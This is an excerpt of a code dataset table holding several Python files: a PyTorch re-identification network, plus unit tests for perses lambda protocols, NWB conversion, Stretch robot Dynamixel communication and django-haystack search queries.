hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d03c86f155c8fc0c5d3590fb223cc462c303de1d | 6,353 | py | Python | models/BFE.py | anonymous1computervision/REID | 6364d7d0e75ebb81fafc765be41b9b3fd434eeae | [
"MIT"
] | null | null | null | models/BFE.py | anonymous1computervision/REID | 6364d7d0e75ebb81fafc765be41b9b3fd434eeae | [
"MIT"
] | null | null | null | models/BFE.py | anonymous1computervision/REID | 6364d7d0e75ebb81fafc765be41b9b3fd434eeae | [
"MIT"
] | 1 | 2019-09-30T12:21:21.000Z | 2019-09-30T12:21:21.000Z | # encoding: utf-8
import copy
import itertools
import numpy as np
import torch
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
import random
from scipy.spatial.distance import cdist
from sklearn.preprocessing import normalize
from torch import nn, optim
from torch.utils.data import dataloader
from torchvision import transforms
from torchvision.models.resnet import Bottleneck, resnet50
from torchvision.transforms import functional
from .resnet import ResNet
def weights_init_kaiming(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_out')
nn.init.constant_(m.bias, 0.0)
elif classname.find('Conv') != -1:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in')
if m.bias is not None:
nn.init.constant_(m.bias, 0.0)
elif classname.find('BatchNorm') != -1:
if m.affine:
nn.init.normal_(m.weight, 1.0, 0.02)
nn.init.constant_(m.bias, 0.0)
def weights_init_classifier(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.normal_(m.weight, std=0.001)
if len(m.bias):
nn.init.constant_(m.bias, 0.0)
class SELayer(nn.Module):
def __init__(self, channel, reduction=16):
super(SELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Linear(channel, channel // reduction),
nn.ReLU(inplace=True),
nn.Linear(channel // reduction, channel),
nn.Sigmoid()
)
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
y = self.fc(y).view(b, c, 1, 1)
return x * y
class BatchDrop(nn.Module):
def __init__(self, h_ratio, w_ratio):
super(BatchDrop, self).__init__()
self.h_ratio = h_ratio
self.w_ratio = w_ratio
def forward(self, x):
if self.training:
h, w = x.size()[-2:]
rh = round(self.h_ratio * h)
rw = round(self.w_ratio * w)
sx = random.randint(0, h - rh)
sy = random.randint(0, w - rw)
mask = x.new_ones(x.size())
mask[:, :, sx:sx + rh, sy:sy + rw] = 0
x = x * mask
return x
class BatchCrop(nn.Module):
def __init__(self, ratio):
super(BatchCrop, self).__init__()
self.ratio = ratio
def forward(self, x):
if self.training:
h, w = x.size()[-2:]
rw = int(self.ratio * w)
start = random.randint(0, h - 1)
if start + rw > h:
select = list(range(0, start + rw - h)) + list(range(start, h))
else:
select = list(range(start, start + rw))
mask = x.new_zeros(x.size())
mask[:, :, select, :] = 1
x = x * mask
return x
class BFE(nn.Module):
def __init__(self, num_classes, width_ratio=0.5, height_ratio=0.5):
super(BFE, self).__init__()
resnet = resnet50(pretrained=True)
self.backbone = nn.Sequential(
resnet.conv1,
resnet.bn1,
resnet.relu,
resnet.maxpool,
resnet.layer1, # res_conv2
resnet.layer2, # res_conv3
resnet.layer3, # res_conv4
)
self.res_part = nn.Sequential(
Bottleneck(1024, 512, stride=1, downsample=nn.Sequential(
nn.Conv2d(1024, 2048, kernel_size=1, stride=1, bias=False),
nn.BatchNorm2d(2048),
)),
Bottleneck(2048, 512),
Bottleneck(2048, 512),
)
self.res_part.load_state_dict(resnet.layer4.state_dict())
reduction = nn.Sequential(
nn.Conv2d(2048, 512, 1),
nn.BatchNorm2d(512),
nn.ReLU()
)
# global branch
self.global_avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.global_softmax = nn.Linear(512, num_classes)
self.global_softmax.apply(weights_init_kaiming)
self.global_reduction = copy.deepcopy(reduction)
self.global_reduction.apply(weights_init_kaiming)
# part branch
self.res_part2 = Bottleneck(2048, 512)
self.part_maxpool = nn.AdaptiveMaxPool2d((1, 1))
self.batch_crop = BatchDrop(height_ratio, width_ratio)
self.reduction = nn.Sequential(
nn.Linear(2048, 1024, 1),
nn.BatchNorm1d(1024),
nn.ReLU()
)
self.reduction.apply(weights_init_kaiming)
self.softmax = nn.Linear(1024, num_classes)
self.softmax.apply(weights_init_kaiming)
def forward(self, x):
"""
:param x: input image tensor of (N, C, H, W)
:return: (prediction, triplet_losses, softmax_losses)
"""
x = self.backbone(x)
x = self.res_part(x)
predict = []
triplet_features = []
softmax_features = []
# global branch
glob = self.global_avgpool(x)
global_triplet_feature = self.global_reduction(glob).squeeze()
global_softmax_class = self.global_softmax(global_triplet_feature)
softmax_features.append(global_softmax_class)
triplet_features.append(global_triplet_feature)
predict.append(global_triplet_feature)
# part branch
x = self.res_part2(x)
x = self.batch_crop(x)
triplet_feature = self.part_maxpool(x).squeeze()
feature = self.reduction(triplet_feature)
softmax_feature = self.softmax(feature)
triplet_features.append(feature)
softmax_features.append(softmax_feature)
predict.append(feature)
if self.training:
return triplet_features, softmax_features
else:
return torch.cat(predict, 1)
def get_optim_policy(self):
params = [
{'params': self.backbone.parameters()},
{'params': self.res_part.parameters()},
{'params': self.global_reduction.parameters()},
{'params': self.global_softmax.parameters()},
{'params': self.res_part2.parameters()},
{'params': self.reduction.parameters()},
{'params': self.softmax.parameters()},
]
return params | 32.248731 | 79 | 0.58618 |
7a264377a00b48cff5b6946876437e3585cb8961 | 1,579 | py | Python | perses/tests/test_lambda_protocol.py | ajsilveira/perses | adff6cecb8c710dabac1dcddf0d05306409b2362 | [
"MIT"
] | null | null | null | perses/tests/test_lambda_protocol.py | ajsilveira/perses | adff6cecb8c710dabac1dcddf0d05306409b2362 | [
"MIT"
] | null | null | null | perses/tests/test_lambda_protocol.py | ajsilveira/perses | adff6cecb8c710dabac1dcddf0d05306409b2362 | [
"MIT"
] | null | null | null | ###########################################
# IMPORTS
###########################################
from perses.annihilation.lambda_protocol import *
from unittest import skipIf
from nose.tools import raises
import os
running_on_github_actions = os.environ.get('GITHUB_ACTIONS', None) == 'true'
#############################################
# TESTS
#############################################
def test_lambda_protocol():
"""
Tests LambdaProtocol, ensures that it can be instantiated with defaults, and that it fails if disallowed functions are tried
"""
# check that it's possible to instantiate a LambdaProtocol for all the default types
for protocol in ['default','namd','quarters']:
lp = LambdaProtocol(functions=protocol)
# check that if we give an incomplete set of parameters it will add in the missing terms
missing_functions = {'lambda_sterics_delete': lambda x : x}
lp = LambdaProtocol(functions=missing_functions)
assert (len(missing_functions) == 1)
assert(len(lp.get_functions()) == 9)
@raises(AssertionError)
def test_lambda_protocol_failure_ends():
bad_function = {'lambda_sterics_delete': lambda x : -x}
lp = LambdaProtocol(functions=bad_function)
@raises(AssertionError)
def test_lambda_protocol_naked_charges():
naked_charge_functions = {'lambda_sterics_insert':
lambda x: 0.0 if x < 0.5 else 2.0 * (x - 0.5),
'lambda_electrostatics_insert':
lambda x: 2.0 * x if x < 0.5 else 1.0}
lp = LambdaProtocol(functions=naked_charge_functions)
| 35.886364 | 128 | 0.630146 |
19f9a68dbdb43073836a0b25a4048e26aced4f9e | 1,445 | py | Python | tests/test_converter.py | JuliaSprenger/nwb-conversion-tools | f6519c88a563fba991e9e8583ed9c4b53a3e48e5 | [
"BSD-3-Clause"
] | null | null | null | tests/test_converter.py | JuliaSprenger/nwb-conversion-tools | f6519c88a563fba991e9e8583ed9c4b53a3e48e5 | [
"BSD-3-Clause"
] | null | null | null | tests/test_converter.py | JuliaSprenger/nwb-conversion-tools | f6519c88a563fba991e9e8583ed9c4b53a3e48e5 | [
"BSD-3-Clause"
] | null | null | null | from tempfile import mkdtemp
from shutil import rmtree
from pathlib import Path
from pynwb import NWBFile
try:
from ndx_events import LabeledEvents
HAVE_NDX_EVENTS = True
except ImportError:
HAVE_NDX_EVENTS = False
from nwb_conversion_tools.basedatainterface import BaseDataInterface
from nwb_conversion_tools import NWBConverter, TutorialRecordingInterface
def test_converter():
if HAVE_NDX_EVENTS:
test_dir = Path(mkdtemp())
nwbfile_path = str(test_dir / "extension_test.nwb")
class NdxEventsInterface(BaseDataInterface):
def run_conversion(self, nwbfile: NWBFile, metadata: dict):
events = LabeledEvents(
name="LabeledEvents",
description="events from my experiment",
timestamps=[0., 0.5, 0.6, 2., 2.05, 3., 3.5, 3.6, 4.],
resolution=1e-5,
data=[0, 1, 2, 3, 5, 0, 1, 2, 4],
labels=["trial_start", "cue_onset", "cue_offset", "response_left", "response_right", "reward"]
)
nwbfile.add_acquisition(events)
class ExtensionTestNWBConverter(NWBConverter):
data_interface_classes = dict(NdxEvents=NdxEventsInterface)
converter = ExtensionTestNWBConverter(source_data=dict(NdxEvents=dict()))
converter.run_conversion(nwbfile_path=nwbfile_path, overwrite=True)
rmtree(test_dir)
| 35.243902 | 114 | 0.651903 |
bccfb127a3f850cce51cb0c63ba00d6cc02e5cb2 | 1,071 | py | Python | body/test/test_dxl_comms.py | AarjuGoyal/stretch_body | 6a13fb978bd505f9b3db596a09926943ba1fc72b | [
"RSA-MD"
] | null | null | null | body/test/test_dxl_comms.py | AarjuGoyal/stretch_body | 6a13fb978bd505f9b3db596a09926943ba1fc72b | [
"RSA-MD"
] | null | null | null | body/test/test_dxl_comms.py | AarjuGoyal/stretch_body | 6a13fb978bd505f9b3db596a09926943ba1fc72b | [
"RSA-MD"
] | null | null | null | # Logging level must be set before importing any stretch_body class
import stretch_body.robot_params
#stretch_body.robot_params.RobotParams.set_logging_level("DEBUG")
import unittest
import stretch_body.device
import stretch_body.robot as robot
import numpy as np
class TestTimingStats(unittest.TestCase):
def test_thread_starvation_group_sync_read(self):
robot = stretch_body.robot.Robot()
robot.end_of_arm.params['use_group_sync_read']=1
print('Starting test_thread_starvation')
print('Latency timer of %f'%robot.end_of_arm.params['dxl_latency_timer'])
print('Testing on tool %s'%robot.params['tool'])
robot.startup()
try:
for itr in range(100): #Make large CPU load
x = np.random.rand(3, 1000, 1000)
x.tolist()
except (IndexError, IOError) as e:
self.fail("IndexError or IOError failure in comms")
self.assertTrue(robot.end_of_arm.comm_errors.status['n_rx']<2)
robot.end_of_arm.comm_errors.pretty_print()
robot.stop()
| 39.666667 | 81 | 0.693744 |
ffe35c19a370382fed199d33329e0694b82f9ad3 | 37,888 | py | Python | test_haystack/test_query.py | nakarinh14/django-haystack | b6dd72e6b5c97b782f5436b7bb4e8227ba6e3b06 | [
"BSD-3-Clause"
] | 2,021 | 2015-02-06T07:45:08.000Z | 2022-03-30T12:26:39.000Z | test_haystack/test_query.py | nakarinh14/django-haystack | b6dd72e6b5c97b782f5436b7bb4e8227ba6e3b06 | [
"BSD-3-Clause"
] | 787 | 2015-02-03T20:06:04.000Z | 2022-03-30T09:00:38.000Z | test_haystack/test_query.py | nakarinh14/django-haystack | b6dd72e6b5c97b782f5436b7bb4e8227ba6e3b06 | [
"BSD-3-Clause"
] | 878 | 2015-02-04T15:29:50.000Z | 2022-03-28T16:51:44.000Z | import datetime
import pickle
from django.test import TestCase
from django.test.utils import override_settings
from haystack import connections, indexes, reset_search_queries
from haystack.backends import SQ, BaseSearchQuery
from haystack.exceptions import FacetingError
from haystack.models import SearchResult
from haystack.query import (
EmptySearchQuerySet,
SearchQuerySet,
ValuesListSearchQuerySet,
ValuesSearchQuerySet,
)
from haystack.utils.loading import UnifiedIndex
from test_haystack.core.models import (
AnotherMockModel,
CharPKMockModel,
MockModel,
UUIDMockModel,
)
from .mocks import (
MOCK_SEARCH_RESULTS,
CharPKMockSearchBackend,
MockSearchBackend,
MockSearchQuery,
ReadQuerySetMockSearchBackend,
UUIDMockSearchBackend,
)
from .test_indexes import (
GhettoAFifthMockModelSearchIndex,
TextReadQuerySetTestSearchIndex,
)
from .test_views import BasicAnotherMockModelSearchIndex, BasicMockModelSearchIndex
class SQTestCase(TestCase):
def test_split_expression(self):
sq = SQ(foo="bar")
self.assertEqual(sq.split_expression("foo"), ("foo", "content"))
self.assertEqual(sq.split_expression("foo__exact"), ("foo", "exact"))
self.assertEqual(sq.split_expression("foo__content"), ("foo", "content"))
self.assertEqual(sq.split_expression("foo__contains"), ("foo", "contains"))
self.assertEqual(sq.split_expression("foo__lt"), ("foo", "lt"))
self.assertEqual(sq.split_expression("foo__lte"), ("foo", "lte"))
self.assertEqual(sq.split_expression("foo__gt"), ("foo", "gt"))
self.assertEqual(sq.split_expression("foo__gte"), ("foo", "gte"))
self.assertEqual(sq.split_expression("foo__in"), ("foo", "in"))
self.assertEqual(sq.split_expression("foo__startswith"), ("foo", "startswith"))
self.assertEqual(sq.split_expression("foo__endswith"), ("foo", "endswith"))
self.assertEqual(sq.split_expression("foo__range"), ("foo", "range"))
self.assertEqual(sq.split_expression("foo__fuzzy"), ("foo", "fuzzy"))
# Unrecognized filter. Fall back to exact.
self.assertEqual(sq.split_expression("foo__moof"), ("foo", "content"))
def test_repr(self):
self.assertEqual(repr(SQ(foo="bar")), "<SQ: AND foo__content=bar>")
self.assertEqual(repr(SQ(foo=1)), "<SQ: AND foo__content=1>")
self.assertEqual(
repr(SQ(foo=datetime.datetime(2009, 5, 12, 23, 17))),
"<SQ: AND foo__content=2009-05-12 23:17:00>",
)
def test_simple_nesting(self):
sq1 = SQ(foo="bar")
sq2 = SQ(foo="bar")
bigger_sq = SQ(sq1 & sq2)
self.assertEqual(
repr(bigger_sq), "<SQ: AND (foo__content=bar AND foo__content=bar)>"
)
another_bigger_sq = SQ(sq1 | sq2)
self.assertEqual(
repr(another_bigger_sq), "<SQ: AND (foo__content=bar OR foo__content=bar)>"
)
one_more_bigger_sq = SQ(sq1 & ~sq2)
self.assertEqual(
repr(one_more_bigger_sq),
"<SQ: AND (foo__content=bar AND NOT (foo__content=bar))>",
)
mega_sq = SQ(bigger_sq & SQ(another_bigger_sq | ~one_more_bigger_sq))
self.assertEqual(
repr(mega_sq),
"<SQ: AND ((foo__content=bar AND foo__content=bar) AND ((foo__content=bar OR foo__content=bar) OR NOT ((foo__content=bar AND NOT (foo__content=bar)))))>",
)
class BaseSearchQueryTestCase(TestCase):
fixtures = ["base_data.json", "bulk_data.json"]
def setUp(self):
super().setUp()
self.bsq = BaseSearchQuery()
def test_get_count(self):
self.bsq.add_filter(SQ(foo="bar"))
self.assertRaises(NotImplementedError, self.bsq.get_count)
def test_build_query(self):
self.bsq.add_filter(SQ(foo="bar"))
self.assertRaises(NotImplementedError, self.bsq.build_query)
def test_add_filter(self):
self.assertEqual(len(self.bsq.query_filter), 0)
self.bsq.add_filter(SQ(foo="bar"))
self.assertEqual(len(self.bsq.query_filter), 1)
self.bsq.add_filter(SQ(foo__lt="10"))
self.bsq.add_filter(~SQ(claris="moof"))
self.bsq.add_filter(SQ(claris="moof"), use_or=True)
self.assertEqual(
repr(self.bsq.query_filter),
"<SQ: OR ((foo__content=bar AND foo__lt=10 AND NOT (claris__content=moof)) OR claris__content=moof)>",
)
self.bsq.add_filter(SQ(claris="moof"))
self.assertEqual(
repr(self.bsq.query_filter),
"<SQ: AND (((foo__content=bar AND foo__lt=10 AND NOT (claris__content=moof)) OR claris__content=moof) AND claris__content=moof)>",
)
self.bsq.add_filter(SQ(claris="wtf mate"))
self.assertEqual(
repr(self.bsq.query_filter),
"<SQ: AND (((foo__content=bar AND foo__lt=10 AND NOT (claris__content=moof)) OR claris__content=moof) AND claris__content=moof AND claris__content=wtf mate)>",
)
def test_add_order_by(self):
self.assertEqual(len(self.bsq.order_by), 0)
self.bsq.add_order_by("foo")
self.assertEqual(len(self.bsq.order_by), 1)
def test_clear_order_by(self):
self.bsq.add_order_by("foo")
self.assertEqual(len(self.bsq.order_by), 1)
self.bsq.clear_order_by()
self.assertEqual(len(self.bsq.order_by), 0)
def test_add_model(self):
self.assertEqual(len(self.bsq.models), 0)
self.assertRaises(AttributeError, self.bsq.add_model, object)
self.assertEqual(len(self.bsq.models), 0)
self.bsq.add_model(MockModel)
self.assertEqual(len(self.bsq.models), 1)
self.bsq.add_model(AnotherMockModel)
self.assertEqual(len(self.bsq.models), 2)
def test_set_limits(self):
self.assertEqual(self.bsq.start_offset, 0)
self.assertEqual(self.bsq.end_offset, None)
self.bsq.set_limits(10, 50)
self.assertEqual(self.bsq.start_offset, 10)
self.assertEqual(self.bsq.end_offset, 50)
def test_clear_limits(self):
self.bsq.set_limits(10, 50)
self.assertEqual(self.bsq.start_offset, 10)
self.assertEqual(self.bsq.end_offset, 50)
self.bsq.clear_limits()
self.assertEqual(self.bsq.start_offset, 0)
self.assertEqual(self.bsq.end_offset, None)
def test_add_boost(self):
self.assertEqual(self.bsq.boost, {})
self.bsq.add_boost("foo", 10)
self.assertEqual(self.bsq.boost, {"foo": 10})
def test_add_highlight(self):
self.assertEqual(self.bsq.highlight, False)
self.bsq.add_highlight()
self.assertEqual(self.bsq.highlight, True)
def test_more_like_this(self):
mock = MockModel()
mock.id = 1
msq = MockSearchQuery()
msq.backend = MockSearchBackend("mlt")
ui = connections["default"].get_unified_index()
bmmsi = BasicMockModelSearchIndex()
ui.build(indexes=[bmmsi])
bmmsi.update()
msq.more_like_this(mock)
self.assertEqual(msq.get_count(), 23)
self.assertEqual(int(msq.get_results()[0].pk), MOCK_SEARCH_RESULTS[0].pk)
def test_add_field_facet(self):
self.bsq.add_field_facet("foo")
self.assertEqual(self.bsq.facets, {"foo": {}})
self.bsq.add_field_facet("bar")
self.assertEqual(self.bsq.facets, {"foo": {}, "bar": {}})
def test_add_date_facet(self):
self.bsq.add_date_facet(
"foo",
start_date=datetime.date(2009, 2, 25),
end_date=datetime.date(2009, 3, 25),
gap_by="day",
)
self.assertEqual(
self.bsq.date_facets,
{
"foo": {
"gap_by": "day",
"start_date": datetime.date(2009, 2, 25),
"end_date": datetime.date(2009, 3, 25),
"gap_amount": 1,
}
},
)
self.bsq.add_date_facet(
"bar",
start_date=datetime.date(2008, 1, 1),
end_date=datetime.date(2009, 12, 1),
gap_by="month",
)
self.assertEqual(
self.bsq.date_facets,
{
"foo": {
"gap_by": "day",
"start_date": datetime.date(2009, 2, 25),
"end_date": datetime.date(2009, 3, 25),
"gap_amount": 1,
},
"bar": {
"gap_by": "month",
"start_date": datetime.date(2008, 1, 1),
"end_date": datetime.date(2009, 12, 1),
"gap_amount": 1,
},
},
)
def test_add_query_facet(self):
self.bsq.add_query_facet("foo", "bar")
self.assertEqual(self.bsq.query_facets, [("foo", "bar")])
self.bsq.add_query_facet("moof", "baz")
self.assertEqual(self.bsq.query_facets, [("foo", "bar"), ("moof", "baz")])
self.bsq.add_query_facet("foo", "baz")
self.assertEqual(
self.bsq.query_facets, [("foo", "bar"), ("moof", "baz"), ("foo", "baz")]
)
def test_add_stats(self):
self.bsq.add_stats_query("foo", ["bar"])
self.assertEqual(self.bsq.stats, {"foo": ["bar"]})
self.bsq.add_stats_query("moof", ["bar", "baz"])
self.assertEqual(self.bsq.stats, {"foo": ["bar"], "moof": ["bar", "baz"]})
def test_add_narrow_query(self):
self.bsq.add_narrow_query("foo:bar")
self.assertEqual(self.bsq.narrow_queries, set(["foo:bar"]))
self.bsq.add_narrow_query("moof:baz")
self.assertEqual(self.bsq.narrow_queries, set(["foo:bar", "moof:baz"]))
def test_set_result_class(self):
# Assert that we're defaulting to ``SearchResult``.
self.assertTrue(issubclass(self.bsq.result_class, SearchResult))
# Custom class.
class IttyBittyResult:
pass
self.bsq.set_result_class(IttyBittyResult)
self.assertTrue(issubclass(self.bsq.result_class, IttyBittyResult))
# Reset to default.
self.bsq.set_result_class(None)
self.assertTrue(issubclass(self.bsq.result_class, SearchResult))
def test_run(self):
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
msq = connections["default"].get_query()
self.assertEqual(len(msq.get_results()), 23)
self.assertEqual(int(msq.get_results()[0].pk), MOCK_SEARCH_RESULTS[0].pk)
# Restore.
connections["default"]._index = self.old_unified_index
def test_clone(self):
self.bsq.add_filter(SQ(foo="bar"))
self.bsq.add_filter(SQ(foo__lt="10"))
self.bsq.add_filter(~SQ(claris="moof"))
self.bsq.add_filter(SQ(claris="moof"), use_or=True)
self.bsq.add_order_by("foo")
self.bsq.add_model(MockModel)
self.bsq.add_boost("foo", 2)
self.bsq.add_highlight()
self.bsq.add_field_facet("foo")
self.bsq.add_date_facet(
"foo",
start_date=datetime.date(2009, 1, 1),
end_date=datetime.date(2009, 1, 31),
gap_by="day",
)
self.bsq.add_query_facet("foo", "bar")
self.bsq.add_stats_query("foo", "bar")
self.bsq.add_narrow_query("foo:bar")
clone = self.bsq._clone()
self.assertTrue(isinstance(clone, BaseSearchQuery))
self.assertEqual(len(clone.query_filter), 2)
self.assertEqual(len(clone.order_by), 1)
self.assertEqual(len(clone.models), 1)
self.assertEqual(len(clone.boost), 1)
self.assertEqual(clone.highlight, True)
self.assertEqual(len(clone.facets), 1)
self.assertEqual(len(clone.date_facets), 1)
self.assertEqual(len(clone.query_facets), 1)
self.assertEqual(len(clone.narrow_queries), 1)
self.assertEqual(clone.start_offset, self.bsq.start_offset)
self.assertEqual(clone.end_offset, self.bsq.end_offset)
self.assertEqual(clone.backend.__class__, self.bsq.backend.__class__)
def test_log_query(self):
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
self.bmmsi.update()
with self.settings(DEBUG=False):
msq = connections["default"].get_query()
self.assertEqual(len(msq.get_results()), 23)
self.assertEqual(len(connections["default"].queries), 0)
with self.settings(DEBUG=True):
# Redefine it to clear out the cached results.
msq2 = connections["default"].get_query()
self.assertEqual(len(msq2.get_results()), 23)
self.assertEqual(len(connections["default"].queries), 1)
self.assertEqual(connections["default"].queries[0]["query_string"], "")
msq3 = connections["default"].get_query()
msq3.add_filter(SQ(foo="bar"))
len(msq3.get_results())
self.assertEqual(len(connections["default"].queries), 2)
self.assertEqual(connections["default"].queries[0]["query_string"], "")
self.assertEqual(connections["default"].queries[1]["query_string"], "")
# Restore.
connections["default"]._index = self.old_unified_index
class CharPKMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="key")
def get_model(self):
return CharPKMockModel
class SimpleMockUUIDModelIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="characteristics")
def get_model(self):
return UUIDMockModel
@override_settings(DEBUG=True)
class SearchQuerySetTestCase(TestCase):
fixtures = ["base_data.json", "bulk_data.json"]
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.cpkmmsi = CharPKMockModelSearchIndex()
self.uuidmmsi = SimpleMockUUIDModelIndex()
self.ui.build(indexes=[self.bmmsi, self.cpkmmsi, self.uuidmmsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
self.msqs = SearchQuerySet()
# Stow.
reset_search_queries()
def tearDown(self):
# Restore.
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_len(self):
self.assertEqual(len(self.msqs), 23)
def test_repr(self):
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
self.assertRegexpMatches(
repr(self.msqs),
r"^<SearchQuerySet: query=<test_haystack.mocks.MockSearchQuery object"
r" at 0x[0-9A-Fa-f]+>, using=None>$",
)
def test_iter(self):
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
msqs = self.msqs.all()
results = [int(res.pk) for res in iter(msqs)]
self.assertEqual(results, [res.pk for res in MOCK_SEARCH_RESULTS[:23]])
self.assertEqual(len(connections["default"].queries), 3)
def test_slice(self):
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
results = self.msqs.all()
self.assertEqual(
[int(res.pk) for res in results[1:11]],
[res.pk for res in MOCK_SEARCH_RESULTS[1:11]],
)
self.assertEqual(len(connections["default"].queries), 1)
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
results = self.msqs.all()
self.assertEqual(int(results[22].pk), MOCK_SEARCH_RESULTS[22].pk)
self.assertEqual(len(connections["default"].queries), 1)
def test_manual_iter(self):
results = self.msqs.all()
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
check = [result.pk for result in results._manual_iter()]
self.assertEqual(
check,
[
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"10",
"11",
"12",
"13",
"14",
"15",
"16",
"17",
"18",
"19",
"20",
"21",
"22",
"23",
],
)
self.assertEqual(len(connections["default"].queries), 3)
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
# Test to ensure we properly fill the cache, even if we get fewer
# results back (not a handled model) than the hit count indicates.
# This will hang indefinitely if broken.
# CharPK testing
old_ui = self.ui
self.ui.build(indexes=[self.cpkmmsi])
connections["default"]._index = self.ui
self.cpkmmsi.update()
results = self.msqs.all()
loaded = [result.pk for result in results._manual_iter()]
self.assertEqual(loaded, ["sometext", "1234"])
self.assertEqual(len(connections["default"].queries), 1)
# UUID testing
self.ui.build(indexes=[self.uuidmmsi])
connections["default"]._index = self.ui
self.uuidmmsi.update()
results = self.msqs.all()
loaded = [result.pk for result in results._manual_iter()]
self.assertEqual(
loaded,
[
"53554c58-7051-4350-bcc9-dad75eb248a9",
"77554c58-7051-4350-bcc9-dad75eb24888",
],
)
connections["default"]._index = old_ui
def test_cache_is_full(self):
reset_search_queries()
self.assertEqual(len(connections["default"].queries), 0)
self.assertEqual(self.msqs._cache_is_full(), False)
results = self.msqs.all()
fire_the_iterator_and_fill_cache = list(results)
self.assertEqual(23, len(fire_the_iterator_and_fill_cache))
self.assertEqual(results._cache_is_full(), True)
self.assertEqual(len(connections["default"].queries), 4)
def test_all(self):
sqs = self.msqs.all()
self.assertTrue(isinstance(sqs, SearchQuerySet))
def test_filter(self):
sqs = self.msqs.filter(content="foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 1)
def test_exclude(self):
sqs = self.msqs.exclude(content="foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.query_filter), 1)
def test_order_by(self):
sqs = self.msqs.order_by("foo")
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertTrue("foo" in sqs.query.order_by)
def test_models(self):
# Stow.
old_unified_index = connections["default"]._index
ui = UnifiedIndex()
bmmsi = BasicMockModelSearchIndex()
bammsi = BasicAnotherMockModelSearchIndex()
ui.build(indexes=[bmmsi, bammsi])
connections["default"]._index = ui
msqs = SearchQuerySet()
sqs = msqs.all()
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.models), 0)
sqs = msqs.models(MockModel)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.models), 1)
sqs = msqs.models(MockModel, AnotherMockModel)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.models), 2)
# This will produce a warning.
ui.build(indexes=[bmmsi])
sqs = msqs.models(AnotherMockModel)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.models), 1)
def test_result_class(self):
sqs = self.msqs.all()
self.assertTrue(issubclass(sqs.query.result_class, SearchResult))
# Custom class.
class IttyBittyResult:
pass
sqs = self.msqs.result_class(IttyBittyResult)
self.assertTrue(issubclass(sqs.query.result_class, IttyBittyResult))
# Reset to default.
sqs = self.msqs.result_class(None)
self.assertTrue(issubclass(sqs.query.result_class, SearchResult))
def test_boost(self):
sqs = self.msqs.boost("foo", 10)
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(len(sqs.query.boost.keys()), 1)
def test_highlight(self):
sqs = self.msqs.highlight()
self.assertTrue(isinstance(sqs, SearchQuerySet))
self.assertEqual(sqs.query.highlight, True)
def test_spelling_override(self):
sqs = self.msqs.filter(content="not the spellchecking query")
self.assertEqual(sqs.query.spelling_query, None)
